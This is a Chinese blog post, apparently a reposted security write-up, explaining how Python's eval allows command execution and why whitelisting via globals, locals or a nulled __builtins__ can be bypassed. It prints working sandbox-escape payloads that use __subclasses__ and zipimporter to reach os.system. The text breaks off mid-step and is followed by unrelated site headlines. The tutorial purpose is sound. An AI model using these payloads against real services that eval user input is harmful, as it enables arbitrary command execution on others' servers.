Python 中 eval 带来的潜在风险
admin
2023-07-31 00:36:13
0

0x00 前言

eval是Python用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码:

12345 #!python>>> eval(\”1+2\”)3>>> eval(\”[x for x in range(10)]\”)[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

当内存中的内置模块含有os的话,eval同样可以做到命令执行:

12345 #!python>>> import os>>> eval(\”os.system(\’whoami\’)\”)win20140812chjadministrator0

当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__

123456789101112 #!python>>> exec(\’import os\’)>>> eval(\’import os\’)Traceback (most recent call last):  File \”\”, line 1, in   File \”\”, line 1    import os         ^SyntaxError: invalid syntax>>> eval(\”__import__(\’os\’).system(\’whoami\’)\”)win20140812chjadministrator0

在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。

0x01 “安全”使用eval


现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:

Eval函数的声明为eval(expression[, globals[, locals]])

其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。

123456789101112 #!python>>> import os>>> \’os\’ in globals()True>>> eval(\’os.system(\’whoami\’)\’)win20140812chjadministrator0>>> eval(\’os.system(\’whoami\’)\’,{},{})Traceback (most recent call last):  File \”\”, line 1, in   File \”\”, line 1, in NameError: name \’os\’ is not defined

如果指定只允许调用abs函数,可以使用下面的写法:

1234567891011 #!python>>> eval(\’abs(-20)\’,{\’abs\’:abs},{\’abs\’:abs})20>>> eval(\’os.system(\’whoami\’)\’,{\’abs\’:abs},{\’abs\’:abs})Traceback (most recent call last):  File \”\”, line 1, in   File \”\”, line 1, in NameError: name \’os\’ is not defined>>> eval(\’os.system(\’whoami\’)\’)win20140812chjadministrator0

使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!

0x02 绕过执行代码1


被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:

123456789 #!pythonenv = {}env[\”locals\”]   = Noneenv[\”globals\”]  = Noneenv[\”__name__\”] = Noneenv[\”__file__\”] = Noneenv[\”__builtins__\”] = None eval(users_str, env)

Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:

12345 #!python>>> __builtins__.abs(20)20>>> abs(20)20

我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:

123456 #!python>>> def hello():...     print \’shabi\’>>> __builtin__.__dict__[\’say_hello\’] = hello>>> say_hello()shabi

小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins____builtin__的一个引用,在__main__模块下,两者是等价的:

12345 #!python>>> id(__builtins__)3549136>>> id(__builtin__)3549136

根据乌云drops提到的方法,使用如下代码即可:

12 #!python[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == \”zipimporter\”][0](\”/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg\”).load_module(\”configobj\”).os.system(\”uname\”)

上面的代码首先利用__class____subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:

123456789101112 #!python>>> \”os\” in configobj.__dict__True>>> import urllib>>> \”os\” in urllib.__dict__True>>> import urllib2>>> \”os\” in urllib2.__dict__True>>> configobj.os.system(\”whoami\”)win20140812chjadministrator0

和configobj类似的模块如urlliburllib2setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:

12 #!pythonfrom setuptools import setup, find_packages

然后执行:

12

相关内容

热门资讯

Mobi、epub格式电子书如... 在wps里全局设置里有一个文件关联,打开,勾选电子书文件选项就可以了。
500 行 Python 代码... 语法分析器描述了一个句子的语法结构,用来帮助其他的应用进行推理。自然语言引入了很多意外的歧义,以我们...
定时清理删除C:\Progra... C:\Program Files (x86)下面很多scoped_dir开头的文件夹 写个批处理 定...
scoped_dir32_70... 一台虚拟机C盘总是莫名奇妙的空间用完,导致很多软件没法再运行。经过仔细检查发现是C:\Program...
65536是2的几次方 计算2... 65536是2的16次方:65536=2⁶ 65536是256的2次方:65536=256 6553...
小程序支付时提示:appid和... [Q]小程序支付时提示:appid和mch_id不匹配 [A]小程序和微信支付没有进行关联,访问“小...
pycparser 是一个用... `pycparser` 是一个用 Python 编写的 C 语言解析器。它可以用来解析 C 代码并构...
微信小程序使用slider实现... 众所周知哈,微信小程序里面的音频播放是没有进度条的,但最近有个项目呢,客户要求音频要有进度条控制,所...
Apache Doris 2.... 亲爱的社区小伙伴们,我们很高兴地向大家宣布,Apache Doris 2.0.0 版本已于...
python清除字符串里非数字... 本文实例讲述了python清除字符串里非数字字符的方法。分享给大家供大家参考。具体如下: impor...